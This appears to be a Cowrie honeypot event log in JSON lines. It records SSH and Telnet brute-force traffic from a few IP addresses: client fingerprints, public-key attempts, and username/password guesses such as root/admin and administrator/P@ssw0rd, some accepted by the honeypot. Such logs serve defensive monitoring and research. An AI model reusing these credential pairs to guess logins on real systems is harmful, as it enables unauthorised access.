{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:52:05.224617Z","src_ip":"212.227.235.229","session":"d7ab1c8745c7"}
{"eventid":"cowrie.session.closed","duration":180.63242149353027,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:52:05.227542Z","src_ip":"212.227.235.229","session":"d7ab1c8745c7"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":41152,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef3385d1ff5d","protocol":"ssh","message":"New connection: 27.112.79.123:41152 (1.2.3.4:22) [session: ef3385d1ff5d]","sensor":"my-vps","timestamp":"2025-08-28T10:52:08.734367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:52:08.735188Z","src_ip":"27.112.79.123","session":"ef3385d1ff5d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:52:08.998195Z","src_ip":"27.112.79.123","session":"ef3385d1ff5d"}
{"eventid":"cowrie.login.failed","username":"jamila","password":"123","message":"login attempt [jamila/123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:52:10.079151Z","src_ip":"27.112.79.123","session":"ef3385d1ff5d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:52:11.341763Z","src_ip":"27.112.79.123","session":"ef3385d1ff5d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63182,"dst_ip":"1.2.3.4","dst_port":22,"session":"7de811699e29","protocol":"ssh","message":"New connection: 212.227.125.160:63182 (1.2.3.4:22) [session: 7de811699e29]","sensor":"my-vps","timestamp":"2025-08-28T10:52:14.250242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T10:52:14.250919Z","src_ip":"212.227.125.160","session":"7de811699e29"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T10:52:14.519607Z","src_ip":"212.227.125.160","session":"7de811699e29"}
{"eventid":"cowrie.login.failed","username":"ann","password":"ann","message":"login attempt [ann/ann] failed","sensor":"my-vps","timestamp":"2025-08-28T10:52:15.525934Z","src_ip":"212.227.125.160","session":"7de811699e29"}
{"eventid":"cowrie.login.failed","username":"ann","password":"ann1","message":"login attempt [ann/ann1] failed","sensor":"my-vps","timestamp":"2025-08-28T10:52:16.637833Z","src_ip":"212.227.125.160","session":"7de811699e29"}
{"eventid":"cowrie.login.failed","username":"ann","password":"ann123","message":"login attempt [ann/ann123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:52:17.758109Z","src_ip":"212.227.125.160","session":"7de811699e29"}
{"eventid":"cowrie.login.failed","username":"ann","password":"ann1234","message":"login attempt [ann/ann1234] failed","sensor":"my-vps","timestamp":"2025-08-28T10:52:18.872804Z","src_ip":"212.227.125.160","session":"7de811699e29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35220,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ab7e6345700","protocol":"ssh","message":"New connection: 212.227.235.229:35220 (1.2.3.4:22) [session: 5ab7e6345700]","sensor":"my-vps","timestamp":"2025-08-28T10:52:19.917448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:52:19.918584Z","src_ip":"212.227.235.229","session":"5ab7e6345700"}
{"eventid":"cowrie.login.failed","username":"ann","password":"ann12345","message":"login attempt [ann/ann12345] failed","sensor":"my-vps","timestamp":"2025-08-28T10:52:19.988078Z","src_ip":"212.227.125.160","session":"7de811699e29"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T10:52:20.021638Z","src_ip":"212.227.235.229","session":"5ab7e6345700"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ab:e4:56:da:c3:e8:22:b4:d2:c6:55:bb:01:69:e4:db","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAv/THcnTYUFCwZZ7eM7diqLDBlVGbuRSefj8Ogqui6I5E3NWesIvQ3KQTkXdPX2F41yVXAFsXRw76drOwuVq5sZJc8TH81vKhXgK2Ltbkc1wcUgkvsSDRlymK5uDitjaY2gD11v+oQQNro6zlnGTM+yH7EFee6v5RwQB+KtcXVZrejYv1ZvrC7GWwfHcGm5UQSItHiFEXNihsE2XqDRwqRBpHnxRJ4f7NEqoL0o/YiuEmB7AbctxFj7/QeTxTZNSNYyH92Ay6XEHjhdsmN1it3/MjOhMm3p0kiFUpDbujpXosYCOIKVgO68ha1aEyyoND9W2MpzYRf9CTtRyLaHTSww==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ab:e4:56:da:c3:e8:22:b4:d2:c6:55:bb:01:69:e4:db","sensor":"my-vps","timestamp":"2025-08-28T10:52:20.229375Z","src_ip":"212.227.235.229","session":"5ab7e6345700"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ab:e4:56:da:c3:e8:22:b4:d2:c6:55:bb:01:69:e4:db","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAv/THcnTYUFCwZZ7eM7diqLDBlVGbuRSefj8Ogqui6I5E3NWesIvQ3KQTkXdPX2F41yVXAFsXRw76drOwuVq5sZJc8TH81vKhXgK2Ltbkc1wcUgkvsSDRlymK5uDitjaY2gD11v+oQQNro6zlnGTM+yH7EFee6v5RwQB+KtcXVZrejYv1ZvrC7GWwfHcGm5UQSItHiFEXNihsE2XqDRwqRBpHnxRJ4f7NEqoL0o/YiuEmB7AbctxFj7/QeTxTZNSNYyH92Ay6XEHjhdsmN1it3/MjOhMm3p0kiFUpDbujpXosYCOIKVgO68ha1aEyyoND9W2MpzYRf9CTtRyLaHTSww==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T10:52:20.230064Z","src_ip":"212.227.235.229","session":"5ab7e6345700"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ab:e4:56:da:c3:e8:22:b4:d2:c6:55:bb:01:69:e4:db","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAv/THcnTYUFCwZZ7eM7diqLDBlVGbuRSefj8Ogqui6I5E3NWesIvQ3KQTkXdPX2F41yVXAFsXRw76drOwuVq5sZJc8TH81vKhXgK2Ltbkc1wcUgkvsSDRlymK5uDitjaY2gD11v+oQQNro6zlnGTM+yH7EFee6v5RwQB+KtcXVZrejYv1ZvrC7GWwfHcGm5UQSItHiFEXNihsE2XqDRwqRBpHnxRJ4f7NEqoL0o/YiuEmB7AbctxFj7/QeTxTZNSNYyH92Ay6XEHjhdsmN1it3/MjOhMm3p0kiFUpDbujpXosYCOIKVgO68ha1aEyyoND9W2MpzYRf9CTtRyLaHTSww==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ab:e4:56:da:c3:e8:22:b4:d2:c6:55:bb:01:69:e4:db","sensor":"my-vps","timestamp":"2025-08-28T10:52:20.334057Z","src_ip":"212.227.235.229","session":"5ab7e6345700"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ab:e4:56:da:c3:e8:22:b4:d2:c6:55:bb:01:69:e4:db","key":"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAv/THcnTYUFCwZZ7eM7diqLDBlVGbuRSefj8Ogqui6I5E3NWesIvQ3KQTkXdPX2F41yVXAFsXRw76drOwuVq5sZJc8TH81vKhXgK2Ltbkc1wcUgkvsSDRlymK5uDitjaY2gD11v+oQQNro6zlnGTM+yH7EFee6v5RwQB+KtcXVZrejYv1ZvrC7GWwfHcGm5UQSItHiFEXNihsE2XqDRwqRBpHnxRJ4f7NEqoL0o/YiuEmB7AbctxFj7/QeTxTZNSNYyH92Ay6XEHjhdsmN1it3/MjOhMm3p0kiFUpDbujpXosYCOIKVgO68ha1aEyyoND9W2MpzYRf9CTtRyLaHTSww==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T10:52:20.335538Z","src_ip":"212.227.235.229","session":"5ab7e6345700"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:52:21.104623Z","src_ip":"212.227.125.160","session":"7de811699e29"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:52:29.917401Z","src_ip":"212.227.235.229","session":"5ab7e6345700"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50394,"dst_ip":"1.2.3.4","dst_port":22,"session":"73f1f99bfd58","protocol":"ssh","message":"New connection: 212.227.125.160:50394 (1.2.3.4:22) [session: 73f1f99bfd58]","sensor":"my-vps","timestamp":"2025-08-28T10:52:55.542576Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:52:55.603859Z","src_ip":"212.227.125.160","session":"73f1f99bfd58"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":59922,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0bb6ba687a6","protocol":"ssh","message":"New connection: 27.112.79.123:59922 (1.2.3.4:22) [session: c0bb6ba687a6]","sensor":"my-vps","timestamp":"2025-08-28T10:53:21.236378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:53:21.237288Z","src_ip":"27.112.79.123","session":"c0bb6ba687a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:53:21.507974Z","src_ip":"27.112.79.123","session":"c0bb6ba687a6"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"123","message":"login attempt [frappe/123] failed","sensor":"my-vps","timestamp":"2025-08-28T10:53:22.643385Z","src_ip":"27.112.79.123","session":"c0bb6ba687a6"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:53:23.917417Z","src_ip":"27.112.79.123","session":"c0bb6ba687a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51296,"dst_ip":"1.2.3.4","dst_port":23,"session":"99a1348c6480","protocol":"telnet","message":"New connection: 212.227.235.229:51296 (1.2.3.4:23) [session: 99a1348c6480]","sensor":"my-vps","timestamp":"2025-08-28T10:54:04.686083Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:54:04.866558Z","src_ip":"212.227.235.229","session":"99a1348c6480"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:54:04.888608Z","src_ip":"212.227.235.229","session":"99a1348c6480"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T10:54:04.889962Z","src_ip":"212.227.235.229","session":"99a1348c6480"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T10:54:04.890905Z","src_ip":"212.227.235.229","session":"99a1348c6480"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":40792,"dst_ip":"1.2.3.4","dst_port":22,"session":"de9e767ff8d1","protocol":"ssh","message":"New connection: 27.112.79.123:40792 (1.2.3.4:22) [session: de9e767ff8d1]","sensor":"my-vps","timestamp":"2025-08-28T10:54:32.324995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:54:32.326185Z","src_ip":"27.112.79.123","session":"de9e767ff8d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:54:32.587626Z","src_ip":"27.112.79.123","session":"de9e767ff8d1"}
{"eventid":"cowrie.login.failed","username":"user","password":"Zaq12wsx!","message":"login attempt [user/Zaq12wsx!] failed","sensor":"my-vps","timestamp":"2025-08-28T10:54:33.676086Z","src_ip":"27.112.79.123","session":"de9e767ff8d1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:54:34.938610Z","src_ip":"27.112.79.123","session":"de9e767ff8d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55622,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad853944352b","protocol":"ssh","message":"New connection: 212.227.235.229:55622 (1.2.3.4:22) [session: ad853944352b]","sensor":"my-vps","timestamp":"2025-08-28T10:54:48.461575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:54:48.462643Z","src_ip":"212.227.235.229","session":"ad853944352b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:54:48.707457Z","src_ip":"212.227.235.229","session":"ad853944352b"}
{"eventid":"cowrie.login.success","username":"root","password":"asdf1234.","message":"login attempt [root/asdf1234.] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:54:50.299009Z","src_ip":"212.227.235.229","session":"ad853944352b"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":43292,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e2c65d8335d","protocol":"ssh","message":"New connection: 27.112.79.123:43292 (1.2.3.4:22) [session: 7e2c65d8335d]","sensor":"my-vps","timestamp":"2025-08-28T10:55:43.842724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:55:43.844425Z","src_ip":"27.112.79.123","session":"7e2c65d8335d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T10:55:44.110694Z","src_ip":"27.112.79.123","session":"7e2c65d8335d"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"P@ssw0rd","message":"login attempt [administrator/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-28T10:55:45.225224Z","src_ip":"27.112.79.123","session":"7e2c65d8335d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:55:46.494888Z","src_ip":"27.112.79.123","session":"7e2c65d8335d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35708,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf2ceebe2839","protocol":"ssh","message":"New connection: 212.227.235.229:35708 (1.2.3.4:22) [session: cf2ceebe2839]","sensor":"my-vps","timestamp":"2025-08-28T10:56:30.183849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:56:30.188038Z","src_ip":"212.227.235.229","session":"cf2ceebe2839"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.79.123","src_port":54496,"dst_ip":"1.2.3.4","dst_port":22,"session":"b307a782a062","protocol":"ssh","message":"New connection: 27.112.79.123:54496 (1.2.3.4:22) [session: b307a782a062]","sensor":"my-vps","timestamp":"2025-08-28T10:56:59.046909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T10:56:59.049034Z","src_ip":"27.112.79.123","session":"b307a782a062"}
